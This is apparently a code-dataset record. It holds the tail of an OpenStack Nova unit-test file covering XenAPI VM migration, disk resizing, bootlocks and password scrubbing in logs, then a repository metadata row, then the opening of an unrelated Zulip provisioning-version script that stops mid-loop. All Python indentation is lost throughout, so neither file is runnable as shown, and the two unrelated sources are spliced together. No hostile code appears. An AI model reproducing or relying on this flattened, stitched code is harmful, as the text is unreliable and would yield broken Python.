network_info = "net_info"
image_meta = objects.ImageMeta.from_dict({"id": "image_id"})
block_device_info = {}
import_root = True
if booted_from_volume:
block_device_info = {'block_device_mapping': [
{'mount_device': '/dev/xvda',
'connection_info': {'data': 'fake-data'}}]}
import_root = False
volumeops.VolumeOps.connect_volume(
{'data': 'fake-data'}).AndReturn(('sr', 'vol-vdi-uuid'))
self.vmops._session.call_xenapi('VDI.get_by_uuid',
'vol-vdi-uuid').AndReturn('vol-vdi-ref')
session = self.vmops._session
self.vmops._ensure_instance_name_unique(name_label)
self.vmops._ensure_enough_free_mem(instance)
di_type = "di_type"
vm_utils.determine_disk_image_type(image_meta).AndReturn(di_type)
root_vdi = {"ref": "fake_ref"}
ephemeral_vdi = {"ref": "fake_ref_e"}
vdis = {"root": root_vdi, "ephemerals": {4: ephemeral_vdi}}
vm_utils.import_all_migrated_disks(self.vmops._session, instance,
import_root=import_root).AndReturn(vdis)
kernel_file = "kernel"
ramdisk_file = "ramdisk"
vm_utils.create_kernel_and_ramdisk(context, session,
instance, name_label).AndReturn((kernel_file, ramdisk_file))
vm_ref = "fake_vm_ref"
rescue = False
self.vmops._create_vm_record(context, instance, name_label,
di_type, kernel_file,
ramdisk_file, image_meta, rescue).AndReturn(vm_ref)
if resize_instance:
self.vmops._resize_up_vdis(instance, vdis)
self.vmops._attach_disks(instance, image_meta, vm_ref, name_label,
vdis, di_type, network_info, False, None, None)
self.vmops._attach_mapped_block_devices(instance, block_device_info)
pci_manager.get_instance_pci_devs(instance).AndReturn([])
self.vmops._inject_instance_metadata(instance, vm_ref)
self.vmops._inject_auto_disk_config(instance, vm_ref)
self.vmops._file_inject_vm_settings(instance, vm_ref, vdis,
network_info)
self.vmops.inject_network_info(instance, network_info, vm_ref)
self.vmops._create_vifs(instance, vm_ref, network_info)
self.vmops.firewall_driver.setup_basic_filtering(instance,
network_info).AndRaise(NotImplementedError)
self.vmops.firewall_driver.prepare_instance_filter(instance,
network_info)
if power_on:
self.vmops._start(instance, vm_ref)
self.vmops._wait_for_instance_to_start(instance, vm_ref)
self.vmops._update_last_dom_id(vm_ref)
self.vmops.firewall_driver.apply_instance_filter(instance,
network_info)
last_call = self.vmops._update_instance_progress(context, instance,
step=5, total_steps=5)
if throw_exception:
last_call.AndRaise(throw_exception)
self.vmops._destroy(instance, vm_ref, network_info=network_info)
vm_utils.destroy_kernel_ramdisk(self.vmops._session, instance,
kernel_file, ramdisk_file)
vm_utils.safe_destroy_vdis(self.vmops._session,
["fake_ref_e", "fake_ref"])
self.mox.ReplayAll()
self.vmops.finish_migration(context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info, power_on)
def test_finish_migration(self):
self._test_finish_migration()
def test_finish_migration_no_power_on(self):
self._test_finish_migration(power_on=False, resize_instance=False)
def test_finish_migration_booted_from_volume(self):
self._test_finish_migration(booted_from_volume=True)
def test_finish_migrate_performs_rollback_on_error(self):
self.assertRaises(test.TestingException, self._test_finish_migration,
power_on=False, resize_instance=False,
throw_exception=test.TestingException())
def test_remove_hostname(self):
vm, vm_ref = self.create_vm("dummy")
instance = {"name": "dummy", "uuid": "1234", "auto_disk_config": None}
self.mox.StubOutWithMock(self._session, 'call_xenapi')
self._session.call_xenapi("VM.remove_from_xenstore_data", vm_ref,
"vm-data/hostname")
self.mox.ReplayAll()
self.vmops._remove_hostname(instance, vm_ref)
self.mox.VerifyAll()
def test_reset_network(self):
class mock_agent(object):
def __init__(self):
self.called = False
def resetnetwork(self):
self.called = True
vm, vm_ref = self.create_vm("dummy")
instance = {"name": "dummy", "uuid": "1234", "auto_disk_config": None}
agent = mock_agent()
self.mox.StubOutWithMock(self.vmops, 'agent_enabled')
self.mox.StubOutWithMock(self.vmops, '_get_agent')
self.mox.StubOutWithMock(self.vmops, '_inject_hostname')
self.mox.StubOutWithMock(self.vmops, '_remove_hostname')
self.vmops.agent_enabled(instance).AndReturn(True)
self.vmops._get_agent(instance, vm_ref).AndReturn(agent)
self.vmops._inject_hostname(instance, vm_ref, False)
self.vmops._remove_hostname(instance, vm_ref)
self.mox.ReplayAll()
self.vmops.reset_network(instance)
self.assertTrue(agent.called)
self.mox.VerifyAll()
def test_inject_hostname(self):
instance = {"hostname": "dummy", "os_type": "fake", "uuid": "uuid"}
vm_ref = "vm_ref"
self.mox.StubOutWithMock(self.vmops, '_add_to_param_xenstore')
self.vmops._add_to_param_xenstore(vm_ref, 'vm-data/hostname', 'dummy')
self.mox.ReplayAll()
self.vmops._inject_hostname(instance, vm_ref, rescue=False)
def test_inject_hostname_with_rescue_prefix(self):
instance = {"hostname": "dummy", "os_type": "fake", "uuid": "uuid"}
vm_ref = "vm_ref"
self.mox.StubOutWithMock(self.vmops, '_add_to_param_xenstore')
self.vmops._add_to_param_xenstore(vm_ref, 'vm-data/hostname',
'RESCUE-dummy')
self.mox.ReplayAll()
self.vmops._inject_hostname(instance, vm_ref, rescue=True)
def test_inject_hostname_with_windows_name_truncation(self):
instance = {"hostname": "dummydummydummydummydummy",
"os_type": "windows", "uuid": "uuid"}
vm_ref = "vm_ref"
self.mox.StubOutWithMock(self.vmops, '_add_to_param_xenstore')
self.vmops._add_to_param_xenstore(vm_ref, 'vm-data/hostname',
'RESCUE-dummydum')
self.mox.ReplayAll()
self.vmops._inject_hostname(instance, vm_ref, rescue=True)
def test_wait_for_instance_to_start(self):
instance = {"uuid": "uuid"}
vm_ref = "vm_ref"
self.mox.StubOutWithMock(vm_utils, 'get_power_state')
self.mox.StubOutWithMock(greenthread, 'sleep')
vm_utils.get_power_state(self._session, vm_ref).AndReturn(
power_state.SHUTDOWN)
greenthread.sleep(0.5)
vm_utils.get_power_state(self._session, vm_ref).AndReturn(
power_state.RUNNING)
self.mox.ReplayAll()
self.vmops._wait_for_instance_to_start(instance, vm_ref)
def test_attach_orig_disks(self):
instance = {"name": "dummy"}
vm_ref = "vm_ref"
vbd_refs = {vmops.DEVICE_ROOT: "vdi_ref"}
self.mox.StubOutWithMock(vm_utils, 'lookup')
self.mox.StubOutWithMock(self.vmops, '_find_vdi_refs')
self.mox.StubOutWithMock(vm_utils, 'create_vbd')
vm_utils.lookup(self.vmops._session, "dummy").AndReturn("ref")
self.vmops._find_vdi_refs("ref", exclude_volumes=True).AndReturn(
vbd_refs)
vm_utils.create_vbd(self.vmops._session, vm_ref, "vdi_ref",
vmops.DEVICE_RESCUE, bootable=False)
self.mox.ReplayAll()
self.vmops._attach_orig_disks(instance, vm_ref)
def test_agent_update_setup(self):
# agent updates need to occur after networking is configured
instance = {'name': 'betelgeuse',
'uuid': '1-2-3-4-5-6'}
vm_ref = 'vm_ref'
agent = xenapi_agent.XenAPIBasedAgent(self.vmops._session,
self.vmops._virtapi, instance, vm_ref)
self.mox.StubOutWithMock(xenapi_agent, 'should_use_agent')
self.mox.StubOutWithMock(self.vmops, '_get_agent')
self.mox.StubOutWithMock(agent, 'get_version')
self.mox.StubOutWithMock(agent, 'resetnetwork')
self.mox.StubOutWithMock(agent, 'update_if_needed')
xenapi_agent.should_use_agent(instance).AndReturn(True)
self.vmops._get_agent(instance, vm_ref).AndReturn(agent)
agent.get_version().AndReturn('1.2.3')
agent.resetnetwork()
agent.update_if_needed('1.2.3')
self.mox.ReplayAll()
self.vmops._configure_new_instance_with_agent(instance, vm_ref,
None, None)
class DestroyTestCase(VMOpsTestBase):
def setUp(self):
super(DestroyTestCase, self).setUp()
self.context = context.RequestContext(user_id=None, project_id=None)
self.instance = fake_instance.fake_instance_obj(self.context)
@mock.patch.object(vm_utils, 'lookup', side_effect=[None, None])
@mock.patch.object(vm_utils, 'hard_shutdown_vm')
@mock.patch.object(volume_utils, 'find_sr_by_uuid')
@mock.patch.object(volume_utils, 'forget_sr')
def test_no_vm_no_bdm(self, forget_sr, find_sr_by_uuid, hard_shutdown_vm,
lookup):
self.vmops.destroy(self.instance, 'network_info',
{'block_device_mapping': []})
self.assertEqual(0, find_sr_by_uuid.call_count)
self.assertEqual(0, forget_sr.call_count)
self.assertEqual(0, hard_shutdown_vm.call_count)
@mock.patch.object(vm_utils, 'lookup', side_effect=[None, None])
@mock.patch.object(vm_utils, 'hard_shutdown_vm')
@mock.patch.object(volume_utils, 'find_sr_by_uuid', return_value=None)
@mock.patch.object(volume_utils, 'forget_sr')
def test_no_vm_orphaned_volume_no_sr(self, forget_sr, find_sr_by_uuid,
hard_shutdown_vm, lookup):
self.vmops.destroy(self.instance, 'network_info',
{'block_device_mapping': [{'connection_info':
{'data': {'volume_id': 'fake-uuid'}}}]})
find_sr_by_uuid.assert_called_once_with(self.vmops._session,
'FA15E-D15C-fake-uuid')
self.assertEqual(0, forget_sr.call_count)
self.assertEqual(0, hard_shutdown_vm.call_count)
@mock.patch.object(vm_utils, 'lookup', side_effect=[None, None])
@mock.patch.object(vm_utils, 'hard_shutdown_vm')
@mock.patch.object(volume_utils, 'find_sr_by_uuid', return_value='sr_ref')
@mock.patch.object(volume_utils, 'forget_sr')
def test_no_vm_orphaned_volume(self, forget_sr, find_sr_by_uuid,
hard_shutdown_vm, lookup):
self.vmops.destroy(self.instance, 'network_info',
{'block_device_mapping': [{'connection_info':
{'data': {'volume_id': 'fake-uuid'}}}]})
find_sr_by_uuid.assert_called_once_with(self.vmops._session,
'FA15E-D15C-fake-uuid')
forget_sr.assert_called_once_with(self.vmops._session, 'sr_ref')
self.assertEqual(0, hard_shutdown_vm.call_count)
@mock.patch.object(vmops.VMOps, '_update_instance_progress')
@mock.patch.object(vmops.VMOps, '_get_vm_opaque_ref')
@mock.patch.object(vm_utils, 'get_sr_path')
@mock.patch.object(vmops.VMOps, '_detach_block_devices_from_orig_vm')
@mock.patch.object(vmops.VMOps, '_migrate_disk_resizing_down')
@mock.patch.object(vmops.VMOps, '_migrate_disk_resizing_up')
class MigrateDiskAndPowerOffTestCase(VMOpsTestBase):
def setUp(self):
super(MigrateDiskAndPowerOffTestCase, self).setUp()
self.context = context.RequestContext('user', 'project')
def test_migrate_disk_and_power_off_works_down(self,
migrate_up, migrate_down, *mocks):
instance = {"root_gb": 2, "ephemeral_gb": 0, "uuid": "uuid"}
flavor = fake_flavor.fake_flavor_obj(self.context, root_gb=1,
ephemeral_gb=0)
self.vmops.migrate_disk_and_power_off(None, instance, None,
flavor, None)
self.assertFalse(migrate_up.called)
self.assertTrue(migrate_down.called)
def test_migrate_disk_and_power_off_works_up(self,
migrate_up, migrate_down, *mocks):
instance = {"root_gb": 1, "ephemeral_gb": 1, "uuid": "uuid"}
flavor = fake_flavor.fake_flavor_obj(self.context, root_gb=2,
ephemeral_gb=2)
self.vmops.migrate_disk_and_power_off(None, instance, None,
flavor, None)
self.assertFalse(migrate_down.called)
self.assertTrue(migrate_up.called)
def test_migrate_disk_and_power_off_resize_down_ephemeral_fails(self,
migrate_up, migrate_down, *mocks):
instance = {"ephemeral_gb": 2}
flavor = fake_flavor.fake_flavor_obj(self.context, ephemeral_gb=1)
self.assertRaises(exception.ResizeError,
self.vmops.migrate_disk_and_power_off,
None, instance, None, flavor, None)
@mock.patch.object(vm_utils, 'get_vdi_for_vm_safely')
@mock.patch.object(vm_utils, 'migrate_vhd')
@mock.patch.object(vmops.VMOps, '_resize_ensure_vm_is_shutdown')
@mock.patch.object(vm_utils, 'get_all_vdi_uuids_for_vm')
@mock.patch.object(vmops.VMOps, '_update_instance_progress')
@mock.patch.object(vmops.VMOps, '_apply_orig_vm_name_label')
class MigrateDiskResizingUpTestCase(VMOpsTestBase):
def _fake_snapshot_attached_here(self, session, instance, vm_ref, label,
userdevice, post_snapshot_callback):
self.assertIsInstance(instance, dict)
if userdevice == '0':
self.assertEqual("vm_ref", vm_ref)
self.assertEqual("fake-snapshot", label)
yield ["leaf", "parent", "grandp"]
else:
leaf = userdevice + "-leaf"
parent = userdevice + "-parent"
yield [leaf, parent]
@mock.patch.object(volume_utils, 'is_booted_from_volume',
return_value=False)
def test_migrate_disk_resizing_up_works_no_ephemeral(self,
mock_is_booted_from_volume,
mock_apply_orig, mock_update_progress, mock_get_all_vdi_uuids,
mock_shutdown, mock_migrate_vhd, mock_get_vdi_for_vm):
context = "ctxt"
instance = {"name": "fake", "uuid": "uuid"}
dest = "dest"
vm_ref = "vm_ref"
sr_path = "sr_path"
mock_get_all_vdi_uuids.return_value = None
mock_get_vdi_for_vm.return_value = ({}, {"uuid": "root"})
with mock.patch.object(vm_utils, '_snapshot_attached_here_impl',
self._fake_snapshot_attached_here):
self.vmops._migrate_disk_resizing_up(context, instance, dest,
vm_ref, sr_path)
mock_get_all_vdi_uuids.assert_called_once_with(self.vmops._session,
vm_ref, min_userdevice=4)
mock_apply_orig.assert_called_once_with(instance, vm_ref)
mock_shutdown.assert_called_once_with(instance, vm_ref)
m_vhd_expected = [mock.call(self.vmops._session, instance, "parent",
dest, sr_path, 1),
mock.call(self.vmops._session, instance, "grandp",
dest, sr_path, 2),
mock.call(self.vmops._session, instance, "root",
dest, sr_path, 0)]
self.assertEqual(m_vhd_expected, mock_migrate_vhd.call_args_list)
prog_expected = [
mock.call(context, instance, 1, 5),
mock.call(context, instance, 2, 5),
mock.call(context, instance, 3, 5),
mock.call(context, instance, 4, 5)
# 5/5: step to be executed by finish migration.
]
self.assertEqual(prog_expected, mock_update_progress.call_args_list)
@mock.patch.object(volume_utils, 'is_booted_from_volume',
return_value=False)
def test_migrate_disk_resizing_up_works_with_two_ephemeral(self,
mock_is_booted_from_volume,
mock_apply_orig, mock_update_progress, mock_get_all_vdi_uuids,
mock_shutdown, mock_migrate_vhd, mock_get_vdi_for_vm):
context = "ctxt"
instance = {"name": "fake", "uuid": "uuid"}
dest = "dest"
vm_ref = "vm_ref"
sr_path = "sr_path"
mock_get_all_vdi_uuids.return_value = ["vdi-eph1", "vdi-eph2"]
mock_get_vdi_for_vm.side_effect = [({}, {"uuid": "root"}),
({}, {"uuid": "4-root"}),
({}, {"uuid": "5-root"})]
with mock.patch.object(vm_utils, '_snapshot_attached_here_impl',
self._fake_snapshot_attached_here):
self.vmops._migrate_disk_resizing_up(context, instance, dest,
vm_ref, sr_path)
mock_get_all_vdi_uuids.assert_called_once_with(self.vmops._session,
vm_ref, min_userdevice=4)
mock_apply_orig.assert_called_once_with(instance, vm_ref)
mock_shutdown.assert_called_once_with(instance, vm_ref)
m_vhd_expected = [mock.call(self.vmops._session, instance,
"parent", dest, sr_path, 1),
mock.call(self.vmops._session, instance,
"grandp", dest, sr_path, 2),
mock.call(self.vmops._session, instance,
"4-parent", dest, sr_path, 1, 1),
mock.call(self.vmops._session, instance,
"5-parent", dest, sr_path, 1, 2),
mock.call(self.vmops._session, instance,
"root", dest, sr_path, 0),
mock.call(self.vmops._session, instance,
"4-root", dest, sr_path, 0, 1),
mock.call(self.vmops._session, instance,
"5-root", dest, sr_path, 0, 2)]
self.assertEqual(m_vhd_expected, mock_migrate_vhd.call_args_list)
prog_expected = [
mock.call(context, instance, 1, 5),
mock.call(context, instance, 2, 5),
mock.call(context, instance, 3, 5),
mock.call(context, instance, 4, 5)
# 5/5: step to be executed by finish migration.
]
self.assertEqual(prog_expected, mock_update_progress.call_args_list)
@mock.patch.object(volume_utils, 'is_booted_from_volume',
return_value=True)
def test_migrate_disk_resizing_up_booted_from_volume(self,
mock_is_booted_from_volume,
mock_apply_orig, mock_update_progress, mock_get_all_vdi_uuids,
mock_shutdown, mock_migrate_vhd, mock_get_vdi_for_vm):
context = "ctxt"
instance = {"name": "fake", "uuid": "uuid"}
dest = "dest"
vm_ref = "vm_ref"
sr_path = "sr_path"
mock_get_all_vdi_uuids.return_value = ["vdi-eph1", "vdi-eph2"]
mock_get_vdi_for_vm.side_effect = [({}, {"uuid": "4-root"}),
({}, {"uuid": "5-root"})]
with mock.patch.object(vm_utils, '_snapshot_attached_here_impl',
self._fake_snapshot_attached_here):
self.vmops._migrate_disk_resizing_up(context, instance, dest,
vm_ref, sr_path)
mock_get_all_vdi_uuids.assert_called_once_with(self.vmops._session,
vm_ref, min_userdevice=4)
mock_apply_orig.assert_called_once_with(instance, vm_ref)
mock_shutdown.assert_called_once_with(instance, vm_ref)
m_vhd_expected = [mock.call(self.vmops._session, instance,
"4-parent", dest, sr_path, 1, 1),
mock.call(self.vmops._session, instance,
"5-parent", dest, sr_path, 1, 2),
mock.call(self.vmops._session, instance,
"4-root", dest, sr_path, 0, 1),
mock.call(self.vmops._session, instance,
"5-root", dest, sr_path, 0, 2)]
self.assertEqual(m_vhd_expected, mock_migrate_vhd.call_args_list)
prog_expected = [
mock.call(context, instance, 1, 5),
mock.call(context, instance, 2, 5),
mock.call(context, instance, 3, 5),
mock.call(context, instance, 4, 5)
# 5/5: step to be executed by finish migration.
]
self.assertEqual(prog_expected, mock_update_progress.call_args_list)
@mock.patch.object(vmops.VMOps, '_restore_orig_vm_and_cleanup_orphan')
@mock.patch.object(volume_utils, 'is_booted_from_volume',
return_value=False)
def test_migrate_disk_resizing_up_rollback(self,
mock_is_booted_from_volume,
mock_restore,
mock_apply_orig, mock_update_progress, mock_get_all_vdi_uuids,
mock_shutdown, mock_migrate_vhd, mock_get_vdi_for_vm):
context = "ctxt"
instance = {"name": "fake", "uuid": "fake"}
dest = "dest"
vm_ref = "vm_ref"
sr_path = "sr_path"
mock_migrate_vhd.side_effect = test.TestingException
mock_restore.side_effect = test.TestingException
with mock.patch.object(vm_utils, '_snapshot_attached_here_impl',
self._fake_snapshot_attached_here):
self.assertRaises(exception.InstanceFaultRollback,
self.vmops._migrate_disk_resizing_up,
context, instance, dest, vm_ref, sr_path)
mock_apply_orig.assert_called_once_with(instance, vm_ref)
mock_restore.assert_called_once_with(instance)
mock_migrate_vhd.assert_called_once_with(self.vmops._session,
instance, "parent", dest, sr_path, 1)
class CreateVMRecordTestCase(VMOpsTestBase):
@mock.patch.object(vm_utils, 'determine_vm_mode')
@mock.patch.object(vm_utils, 'get_vm_device_id')
@mock.patch.object(vm_utils, 'create_vm')
def test_create_vm_record_with_vm_device_id(self, mock_create_vm,
mock_get_vm_device_id, mock_determine_vm_mode):
context = "context"
instance = objects.Instance(vm_mode="vm_mode", uuid="uuid123")
name_label = "dummy"
disk_image_type = "vhd"
kernel_file = "kernel"
ramdisk_file = "ram"
device_id = "0002"
image_properties = {"xenapi_device_id": device_id}
image_meta = objects.ImageMeta.from_dict(
{"properties": image_properties})
rescue = False
session = "session"
self.vmops._session = session
mock_get_vm_device_id.return_value = device_id
mock_determine_vm_mode.return_value = "vm_mode"
self.vmops._create_vm_record(context, instance, name_label,
disk_image_type, kernel_file, ramdisk_file, image_meta, rescue)
mock_get_vm_device_id.assert_called_with(session, image_meta)
mock_create_vm.assert_called_with(session, instance, name_label,
kernel_file, ramdisk_file, False, device_id)
class BootableTestCase(VMOpsTestBase):
def setUp(self):
super(BootableTestCase, self).setUp()
self.instance = {"name": "test", "uuid": "fake"}
vm_rec, self.vm_ref = self.create_vm('test')
# sanity check bootlock is initially disabled:
self.assertEqual({}, vm_rec['blocked_operations'])
def _get_blocked(self):
vm_rec = self._session.call_xenapi("VM.get_record", self.vm_ref)
return vm_rec['blocked_operations']
def test_acquire_bootlock(self):
self.vmops._acquire_bootlock(self.vm_ref)
blocked = self._get_blocked()
self.assertIn('start', blocked)
def test_release_bootlock(self):
self.vmops._acquire_bootlock(self.vm_ref)
self.vmops._release_bootlock(self.vm_ref)
blocked = self._get_blocked()
self.assertNotIn('start', blocked)
def test_set_bootable(self):
self.vmops.set_bootable(self.instance, True)
blocked = self._get_blocked()
self.assertNotIn('start', blocked)
def test_set_not_bootable(self):
self.vmops.set_bootable(self.instance, False)
blocked = self._get_blocked()
self.assertIn('start', blocked)
@mock.patch.object(vm_utils, 'update_vdi_virtual_size', autospec=True)
class ResizeVdisTestCase(VMOpsTestBase):
def test_dont_resize_root_volumes_osvol_false(self, mock_resize):
instance = fake_instance.fake_db_instance(root_gb=20)
vdis = {'root': {'osvol': False, 'ref': 'vdi_ref'}}
self.vmops._resize_up_vdis(instance, vdis)
self.assertTrue(mock_resize.called)
def test_dont_resize_root_volumes_osvol_true(self, mock_resize):
instance = fake_instance.fake_db_instance(root_gb=20)
vdis = {'root': {'osvol': True}}
self.vmops._resize_up_vdis(instance, vdis)
self.assertFalse(mock_resize.called)
def test_dont_resize_root_volumes_no_osvol(self, mock_resize):
instance = fake_instance.fake_db_instance(root_gb=20)
vdis = {'root': {}}
self.vmops._resize_up_vdis(instance, vdis)
self.assertFalse(mock_resize.called)
@mock.patch.object(vm_utils, 'get_ephemeral_disk_sizes')
def test_ensure_ephemeral_resize_with_root_volume(self, mock_sizes,
mock_resize):
mock_sizes.return_value = [2000, 1000]
instance = fake_instance.fake_db_instance(root_gb=20, ephemeral_gb=20)
ephemerals = {"4": {"ref": 4}, "5": {"ref": 5}}
vdis = {'root': {'osvol': True, 'ref': 'vdi_ref'},
'ephemerals': ephemerals}
with mock.patch.object(vm_utils, 'generate_single_ephemeral',
autospec=True) as g:
self.vmops._resize_up_vdis(instance, vdis)
self.assertEqual([mock.call(self.vmops._session, instance, 4,
2000),
mock.call(self.vmops._session, instance, 5,
1000)],
mock_resize.call_args_list)
self.assertFalse(g.called)
def test_resize_up_vdis_root(self, mock_resize):
instance = {"root_gb": 20, "ephemeral_gb": 0}
self.vmops._resize_up_vdis(instance, {"root": {"ref": "vdi_ref"}})
mock_resize.assert_called_once_with(self.vmops._session, instance,
"vdi_ref", 20)
def test_resize_up_vdis_zero_disks(self, mock_resize):
instance = {"root_gb": 0, "ephemeral_gb": 0}
self.vmops._resize_up_vdis(instance, {"root": {}})
self.assertFalse(mock_resize.called)
def test_resize_up_vdis_no_vdis_like_initial_spawn(self, mock_resize):
instance = {"root_gb": 0, "ephemeral_gb": 3000}
vdis = {}
self.vmops._resize_up_vdis(instance, vdis)
self.assertFalse(mock_resize.called)
@mock.patch.object(vm_utils, 'get_ephemeral_disk_sizes')
def test_resize_up_vdis_ephemeral(self, mock_sizes, mock_resize):
mock_sizes.return_value = [2000, 1000]
instance = {"root_gb": 0, "ephemeral_gb": 3000}
ephemerals = {"4": {"ref": 4}, "5": {"ref": 5}}
vdis = {"ephemerals": ephemerals}
self.vmops._resize_up_vdis(instance, vdis)
mock_sizes.assert_called_once_with(3000)
expected = [mock.call(self.vmops._session, instance, 4, 2000),
mock.call(self.vmops._session, instance, 5, 1000)]
self.assertEqual(expected, mock_resize.call_args_list)
@mock.patch.object(vm_utils, 'generate_single_ephemeral')
@mock.patch.object(vm_utils, 'get_ephemeral_disk_sizes')
def test_resize_up_vdis_ephemeral_with_generate(self, mock_sizes,
mock_generate,
mock_resize):
mock_sizes.return_value = [2000, 1000]
instance = {"root_gb": 0, "ephemeral_gb": 3000, "uuid": "a"}
ephemerals = {"4": {"ref": 4}}
vdis = {"ephemerals": ephemerals}
self.vmops._resize_up_vdis(instance, vdis)
mock_sizes.assert_called_once_with(3000)
mock_resize.assert_called_once_with(self.vmops._session, instance,
4, 2000)
mock_generate.assert_called_once_with(self.vmops._session, instance,
None, 5, 1000)
@mock.patch.object(vm_utils, 'remove_old_snapshots')
class CleanupFailedSnapshotTestCase(VMOpsTestBase):
def test_post_interrupted_snapshot_cleanup(self, mock_remove):
self.vmops._get_vm_opaque_ref = mock.Mock()
self.vmops._get_vm_opaque_ref.return_value = "vm_ref"
self.vmops.post_interrupted_snapshot_cleanup("context", "instance")
mock_remove.assert_called_once_with(self.vmops._session,
"instance", "vm_ref")
class LiveMigrateHelperTestCase(VMOpsTestBase):
def test_connect_block_device_volumes_none(self):
self.assertEqual({}, self.vmops.connect_block_device_volumes(None))
@mock.patch.object(volumeops.VolumeOps, "connect_volume")
def test_connect_block_device_volumes_calls_connect(self, mock_connect):
with mock.patch.object(self.vmops._session,
"call_xenapi") as mock_session:
mock_connect.return_value = ("sr_uuid", None)
mock_session.return_value = "sr_ref"
bdm = {"connection_info": "c_info"}
bdi = {"block_device_mapping": [bdm]}
result = self.vmops.connect_block_device_volumes(bdi)
self.assertEqual({'sr_uuid': 'sr_ref'}, result)
mock_connect.assert_called_once_with("c_info")
mock_session.assert_called_once_with("SR.get_by_uuid",
"sr_uuid")
@mock.patch.object(vmops.VMOps, '_resize_ensure_vm_is_shutdown')
@mock.patch.object(vmops.VMOps, '_apply_orig_vm_name_label')
@mock.patch.object(vmops.VMOps, '_update_instance_progress')
@mock.patch.object(vm_utils, 'get_vdi_for_vm_safely')
@mock.patch.object(vm_utils, 'resize_disk')
@mock.patch.object(vm_utils, 'migrate_vhd')
@mock.patch.object(vm_utils, 'destroy_vdi')
class MigrateDiskResizingDownTestCase(VMOpsTestBase):
def test_migrate_disk_resizing_down_works_no_ephemeral(
self,
mock_destroy_vdi,
mock_migrate_vhd,
mock_resize_disk,
mock_get_vdi_for_vm_safely,
mock_update_instance_progress,
mock_apply_orig_vm_name_label,
mock_resize_ensure_vm_is_shutdown):
context = "ctx"
instance = {"name": "fake", "uuid": "uuid"}
dest = "dest"
vm_ref = "vm_ref"
sr_path = "sr_path"
instance_type = dict(root_gb=1)
old_vdi_ref = "old_ref"
new_vdi_ref = "new_ref"
new_vdi_uuid = "new_uuid"
mock_get_vdi_for_vm_safely.return_value = (old_vdi_ref, None)
mock_resize_disk.return_value = (new_vdi_ref, new_vdi_uuid)
self.vmops._migrate_disk_resizing_down(context, instance, dest,
instance_type, vm_ref, sr_path)
mock_get_vdi_for_vm_safely.assert_called_once_with(
self.vmops._session,
vm_ref)
mock_resize_ensure_vm_is_shutdown.assert_called_once_with(
instance, vm_ref)
mock_apply_orig_vm_name_label.assert_called_once_with(
instance, vm_ref)
mock_resize_disk.assert_called_once_with(
self.vmops._session,
instance,
old_vdi_ref,
instance_type)
mock_migrate_vhd.assert_called_once_with(
self.vmops._session,
instance,
new_vdi_uuid,
dest,
sr_path, 0)
mock_destroy_vdi.assert_called_once_with(
self.vmops._session,
new_vdi_ref)
prog_expected = [
mock.call(context, instance, 1, 5),
mock.call(context, instance, 2, 5),
mock.call(context, instance, 3, 5),
mock.call(context, instance, 4, 5)
# 5/5: step to be executed by finish migration.
]
self.assertEqual(prog_expected,
mock_update_instance_progress.call_args_list)
class GetVdisForInstanceTestCase(VMOpsTestBase):
"""Tests get_vdis_for_instance utility method."""
def setUp(self):
super(GetVdisForInstanceTestCase, self).setUp()
self.context = context.get_admin_context()
self.context.auth_token = 'auth_token'
self.session = mock.Mock()
self.vmops._session = self.session
self.instance = fake_instance.fake_instance_obj(self.context)
self.name_label = 'name'
self.image = 'fake_image_id'
@mock.patch.object(volumeops.VolumeOps, "connect_volume",
return_value=("sr", "vdi_uuid"))
def test_vdis_for_instance_bdi_password_scrubbed(self, get_uuid_mock):
# setup fake data
data = {'name_label': self.name_label,
'sr_uuid': 'fake',
'auth_password': 'scrubme'}
bdm = [{'mount_device': '/dev/vda',
'connection_info': {'data': data}}]
bdi = {'root_device_name': 'vda',
'block_device_mapping': bdm}
# Tests that the parameters to the to_xml method are sanitized for
# passwords when logged.
def fake_debug(*args, **kwargs):
if 'auth_password' in args[0]:
self.assertNotIn('scrubme', args[0])
fake_debug.matched = True
fake_debug.matched = False
with mock.patch.object(vmops.LOG, 'debug',
side_effect=fake_debug) as debug_mock:
vdis = self.vmops._get_vdis_for_instance(self.context,
self.instance, self.name_label, self.image,
image_type=4, block_device_info=bdi)
self.assertEqual(1, len(vdis))
get_uuid_mock.assert_called_once_with({"data": data})
# we don't care what the log message is, we just want to make sure
# our stub method is called which asserts the password is scrubbed
self.assertTrue(debug_mock.called)
self.assertTrue(fake_debug.matched)
| nikesh-mahalka/nova | nova/tests/unit/virt/xenapi/test_vmops.py | Python | apache-2.0 | 57,400 |
import glob
import os
import subprocess
import sys
from distutils.version import LooseVersion
from typing import Iterable, List, Optional, Tuple
from scripts.lib.zulip_tools import get_dev_uuid_var_path
from version import PROVISION_VERSION
ZULIP_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
def get_major_version(v: str) -> int:
return int(v.split('.')[0])
def get_version_file() -> str:
uuid_var_path = get_dev_uuid_var_path()
return os.path.join(uuid_var_path, 'provision_version')
PREAMBLE = '''
Before we run tests, we make sure your provisioning version
is correct by looking at var/provision_version, which is at
version %s, and we compare it to the version in source
control (version.py), which is %s.
'''
def preamble(version: str) -> str:
text = PREAMBLE % (version, PROVISION_VERSION)
text += '\n'
return text
NEED_TO_DOWNGRADE = '''
It looks like you checked out a branch that expects an older
version of dependencies than the version you provisioned last.
This may be ok, but it's likely that you either want to rebase
your branch on top of upstream/master or re-provision your VM.
Do this: `./tools/provision`
'''
NEED_TO_UPGRADE = '''
It looks like you checked out a branch that has added
dependencies beyond what you last provisioned. Your command
is likely to fail until you add dependencies by provisioning.
Do this: `./tools/provision`
'''
def get_provisioning_status() -> Tuple[bool, Optional[str]]:
version_file = get_version_file()
if not os.path.exists(version_file):
# If the developer doesn't have a version_file written by
# a previous provision, then we don't do any safety checks
# here on the assumption that the developer is managing
# their own dependencies and not running provision.
return True, None
with open(version_file) as f:
version = f.read().strip()
# Normal path for people that provision--we're all good!
if version == PROVISION_VERSION:
return True, None
# We may be more provisioned than the branch we just moved to. As
# long as the major version hasn't changed, then we should be ok.
if LooseVersion(version) > LooseVersion(PROVISION_VERSION):
if get_major_version(version) == get_major_version(PROVISION_VERSION):
return True, None
else:
return False, preamble(version) + NEED_TO_DOWNGRADE
return False, preamble(version) + NEED_TO_UPGRADE
def assert_provisioning_status_ok(force: bool) -> None:
if not force:
ok, msg = get_provisioning_status()
if not ok:
print(msg)
print('If you really know what you are doing, use --force to run anyway.')
sys.exit(1)
def find_js_test_files(test_dir: str, files: Iterable[str]) -> List[str]:
test_files = []
for file in files:
for file_name in os.listdir(test_dir):
if file_name.startswith(file):
